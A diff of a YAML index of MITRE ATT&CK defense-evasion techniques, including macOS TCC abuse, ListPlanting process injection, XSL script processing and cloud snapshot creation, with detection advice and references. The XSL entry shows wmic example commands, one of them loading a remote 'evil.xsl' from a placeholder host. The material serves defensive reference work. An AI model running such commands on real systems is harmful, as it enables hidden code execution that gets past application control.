-        & Control (TCC) service or database to execute malicious applications with
-        elevated permissions. TCC is a Privacy & Security macOS control mechanism
-        used to determine if the running process has permission to access the data
-        or services protected by TCC, such as screen sharing, camera, microphone,
-        or Full Disk Access (FDA).\n\nWhen an application requests to access data
-        or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
-        located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
-        for existing permissions. If permissions do not exist, then the user is prompted
-        to grant permission. Once permissions are granted, the database stores the
-        application's permissions and will not prompt the user again unless reset.
-        For example, when a web browser requests permissions to the user's webcam,
-        once granted the web browser may not explicitly prompt the user again.(Citation:
-        welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
-        abuse the TCC service to execute malicious content. This can be done in various
-        ways, including using privileged system applications to execute malicious
-        payloads or manipulating the database to grant their application TCC permissions.
-        \n\nFor example, adversaries can use Finder, which has FDA permissions by
-        default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
-        while preventing a user prompt. For a system without System Integrity Protection
-        (SIP) enabled, adversaries have also manipulated the operating system to load
-        an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
-        TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
-        inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
-        into targeted applications with the desired TCC permissions.\n"
+      description: |+
+        Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+        When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+        Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -13456,6 +13744,8 @@ defense-evasion:
         phase_name: privilege-escalation
       x_mitre_contributors:
       - Marina Liang
+      - Wojciech Reguła @_r3ggi
+      - Csaba Fitzl @theevilbit of Kandji
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -13463,7 +13753,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - macOS
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Modification'
@@ -13493,7 +13783,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.008:
     technique:
@@ -13539,7 +13828,7 @@ defense-evasion:
         description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
           Retrieved December 20, 2017.
         source_name: Chokepoint preload rootkits
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:26:31.766Z'
       name: Ptrace System Calls
       description: "Adversaries may inject malicious code into processes via ptrace
         (process trace) system calls in order to evade process-based defenses as well
@@ -13584,8 +13873,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1027.007:
     technique:
@@ -13630,7 +13917,7 @@ defense-evasion:
         To avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://attack.mitre.org/techniques/T1027/002), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.
 
         Various methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash)
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-08-23T18:32:46.899Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Obfuscated Files or Information: Dynamic API Resolution'
       x_mitre_detection: ''
@@ -13644,58 +13931,28 @@ defense-evasion:
       - 'Process: OS API Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1027.007
     atomic_tests: []
   T1055.015:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - ESET
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
-      type: attack-pattern
-      created: '2021-11-22T15:02:15.190Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1055.015
-        url: https://attack.mitre.org/techniques/T1055/015
-      - source_name: Microsoft List View Controls
-        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
-        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
-          January 4, 2022.
-      - source_name: Modexp Windows Process Injection
-        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
-        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
-          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
-          Retrieved November 15, 2021.'
-      - source_name: ESET InvisiMole June 2020
-        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
-        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
-          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-14T17:34:33.948Z'
       name: 'Process Injection: ListPlanting'
       description: "Adversaries may abuse list-view controls to inject malicious code
         into hijacked processes in order to evade process-based defenses as well as
         possibly elevate privileges. ListPlanting is a method of executing arbitrary
-        code in the address space of a separate live process. Code executed via ListPlanting
-        may also evade detection from security products since the execution is masked
-        under a legitimate process.\n\nList-view controls are user interface windows
-        used to display collections of items.(Citation: Microsoft List View Controls)
-        Information about an application's list-view settings are stored within the
-        process' memory in a <code>SysListView32</code> control.\n\nListPlanting (a
-        form of message-passing \"shatter attack\") may be performed by copying code
-        into the virtual address space of a process that uses a list-view control
-        then using that code as a custom callback for sorting the listed items.(Citation:
-        Modexp Windows Process Injection) Adversaries must first copy code into the
-        target process’ memory space, which can be performed various ways including
-        by directly obtaining a handle to the <code>SysListView32</code> child of
-        the victim process window (via Windows API calls such as <code>FindWindow</code>
+        code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+        Code executed via ListPlanting may also evade detection from security products
+        since the execution is masked under a legitimate process.\n\nList-view controls
+        are user interface windows used to display collections of items.(Citation:
+        Microsoft List View Controls) Information about an application's list-view
+        settings are stored within the process' memory in a <code>SysListView32</code>
+        control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+        be performed by copying code into the virtual address space of a process that
+        uses a list-view control then using that code as a custom callback for sorting
+        the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+        must first copy code into the target process’ memory space, which can be performed
+        various ways including by directly obtaining a handle to the <code>SysListView32</code>
+        child of the victim process window (via Windows API calls such as <code>FindWindow</code>
         and/or <code>EnumWindows</code>) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
         methods.\n\nSome variations of ListPlanting may allocate memory in the target
         process but then use window messages to copy the payload, to avoid the use
@@ -13712,6 +13969,9 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - ESET
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitoring Windows API calls indicative of the various types
         of code injection may generate a significant amount of data and may not be
         directly useful for defense unless collected under specific circumstances
@@ -13726,21 +13986,52 @@ defense-evasion:
         arguments.\n\nAnalyze process behavior to determine if a process is performing
         unusual actions, such as opening network connections, reading files, or other
         suspicious actions that could relate to post-compromise behavior. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: Process Modification'
       - 'Process: OS API Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+      created: '2021-11-22T15:02:15.190Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1055/015
+        external_id: T1055.015
+      - source_name: Hexacorn Listplanting
+        description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+          trick. Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+      - source_name: ESET InvisiMole June 2020
+        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+      - source_name: Microsoft List View Controls
+        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+          January 4, 2022.
+        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+      - source_name: Modexp Windows Process Injection
+        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+          Retrieved November 15, 2021.'
+        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1055.015
     atomic_tests: []
   T1484:
     technique:
-      modified: '2024-04-19T04:27:31.884Z'
+      modified: '2024-10-15T15:55:32.946Z'
       name: Domain or Tenant Policy Modification
       description: "Adversaries may modify the configuration settings of a domain
         or identity tenant to evade defenses and/or escalate privileges in centrally
@@ -13785,9 +14076,8 @@ defense-evasion:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '3.0'
+      - Identity Provider
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Deletion'
       - 'Active Directory: Active Directory Object Creation'
@@ -13844,8 +14134,8 @@ defense-evasion:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Sygnia Golden SAML
         description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
           Attack. Retrieved January 6, 2021.
@@ -13854,57 +14144,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1220:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Avneet Singh
-      - Casey Smith
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
-      created: '2018-10-17T00:14:20.652Z'
-      x_mitre_version: '1.2'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1220
-        url: https://attack.mitre.org/techniques/T1220
-      - source_name: Reaqta MSXSL Spearphishing MAR 2018
-        url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
-        description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
-          MSXSL. Retrieved July 3, 2018.
-      - source_name: Twitter SquiblyTwo Detection APR 2018
-        url: https://twitter.com/dez_/status/986614411711442944
-        description: Desimone, J. (2018, April 18). Status Update. Retrieved July
-          3, 2018.
-      - source_name: LOLBAS Wmic
-        url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
-        description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
-      - source_name: Microsoft msxsl.exe
-        url: https://www.microsoft.com/download/details.aspx?id=21714
-        description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
-          Retrieved July 3, 2018.
-      - source_name: Penetration Testing Lab MSXSL July 2017
-        url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
-        description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
-          July 3, 2018.
-      - source_name: XSL Bypass Mar 2019
-        url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
-        description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
-          Proxy Code Execution. Retrieved August 2, 2019.
-      - source_name: Microsoft XSLT Script Mar 2017
-        url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
-        description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
-          Using <msxsl:script>. Retrieved July 3, 2018.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-09-12T19:40:12.337Z'
+      name: XSL Script Processing
       description: |-
         Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)
 
@@ -13922,29 +14166,73 @@ defense-evasion:
 
         * Local File: <code>wmic process list /FORMAT:evil[.]xsl</code>
         * Remote File: <code>wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”</code>
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: XSL Script Processing
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Avneet Singh
+      - Casey Smith
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.
 
         The presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.
-      kill_chain_phases:
-      - phase_name: defense-evasion
-        kill_chain_name: mitre-attack
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Process: Process Creation'
-      x_mitre_system_requirements:
-      - Microsoft Core XML Services (MSXML) or access to wmic.exe
       x_mitre_defense_bypassed:
       - Anti-virus
       - Digital Certificate Validation
       - Application Control
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_system_requirements:
+      - Microsoft Core XML Services (MSXML) or access to wmic.exe
+      type: attack-pattern
+      id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
+      created: '2018-10-17T00:14:20.652Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1220
+        external_id: T1220
+      - source_name: Reaqta MSXSL Spearphishing MAR 2018
+        description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
+          MSXSL. Retrieved July 3, 2018.
+        url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
+      - source_name: Twitter SquiblyTwo Detection APR 2018
+        description: Desimone, J. (2018, April 18). Status Update. Retrieved September
+          12, 2024.
+        url: https://x.com/dez_/status/986614411711442944
+      - source_name: LOLBAS Wmic
+        description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
+        url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
+      - source_name: Microsoft msxsl.exe
+        description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
+          Retrieved July 3, 2018.
+        url: https://www.microsoft.com/download/details.aspx?id=21714
+      - source_name: Penetration Testing Lab MSXSL July 2017
+        description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
+          July 3, 2018.
+        url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
+      - source_name: XSL Bypass Mar 2019
+        description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
+          Proxy Code Execution. Retrieved August 2, 2019.
+        url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
+      - source_name: Microsoft XSLT Script Mar 2017
+        description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
+          Using <msxsl:script>. Retrieved July 3, 2018.
+        url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1220
     atomic_tests: []
   T1564.001:
@@ -13977,7 +14265,7 @@ defense-evasion:
         description: 'Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware.
           Retrieved July 10, 2017.'
         source_name: WireLurker
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-29T22:32:25.985Z'
       name: 'Hide Artifacts: Hidden Files and Directories'
       description: |-
         Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (<code>dir /a</code> for Windows and <code>ls –a</code> for Linux and macOS).
@@ -14005,48 +14293,11 @@ defense-evasion:
       - Host forensic analysis
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1564.001
     atomic_tests: []
   T1578.001:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
-      type: attack-pattern
-      created: '2020-06-09T15:33:13.563Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1578.001
-        url: https://attack.mitre.org/techniques/T1578/001
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: AWS Cloud Trail Backup API
-        url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
-        description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
-          Retrieved April 27, 2020.
-      - source_name: Azure - Monitor Logs
-        url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
-        description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
-          Retrieved May 1, 2020.
-      - source_name: Cloud Audit Logs
-        url: https://cloud.google.com/logging/docs/audit#admin-activity
-        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
-      - source_name: GCP - Creating and Starting a VM
-        url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
-        description: Google. (2020, April 23). Creating and Starting a VM instance.
-          Retrieved May 1, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:53:44.870Z'
       name: Create Snapshot
       description: |-
         An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.
@@ -14055,6 +14306,9 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         The creation of a snapshot is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities such as the creation of one or more snapshots and the restoration of these snapshots by a new user account.
 
@@ -14063,20 +14317,51 @@ defense-evasion:
         In Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)
 
         Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the <code>gcloud compute instances create</code> command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the <code>"sourceSnapshot":</code> parameter pointed to <code>"global/snapshots/[BOOT_SNAPSHOT_NAME]</code>.(Citation: GCP - Creating and Starting a VM)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Snapshot: Snapshot Creation'
       - 'Snapshot: Snapshot Metadata'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
+      created: '2020-06-09T15:33:13.563Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1578/001
+        external_id: T1578.001
+      - source_name: AWS Cloud Trail Backup API
+        description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
+          Retrieved April 27, 2020.
+        url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
+      - source_name: GCP - Creating and Starting a VM
+        description: Google. (2020, April 23). Creating and Starting a VM instance.
+          Retrieved May 1, 2020.
+        url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
+      - source_name: Cloud Audit Logs
+        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+        url: https://cloud.google.com/logging/docs/audit#admin-activity
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: Azure - Monitor Logs
+        description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
+          Retrieved May 1, 2020.
+        url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1550.001:
     technique:
-      modified: '2024-04-12T21:18:28.848Z'
+      modified: '2024-10-15T15:38:11.583Z'
       name: Application Access Token
       description: "Adversaries may use stolen application access tokens to bypass
         the typical authentication process and access restricted accounts, information,
@@ -14133,6 +14418,7 @@ defense-evasion:
       - Dylan Silva, AWS Security
       - Jack Burns, HubSpot
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
         granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -14143,13 +14429,12 @@ defense-evasion:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - Containers
       - IaaS
-      - Azure AD
-      x_mitre_version: '1.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.7'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       x_mitre_defense_bypassed:
@@ -14208,11 +14493,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -14252,8 +14536,10 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -14261,13 +14547,13 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -14298,9 +14584,6 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests: []
   T1480.001:
@@ -14361,7 +14644,7 @@ defense-evasion:
         Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.
 
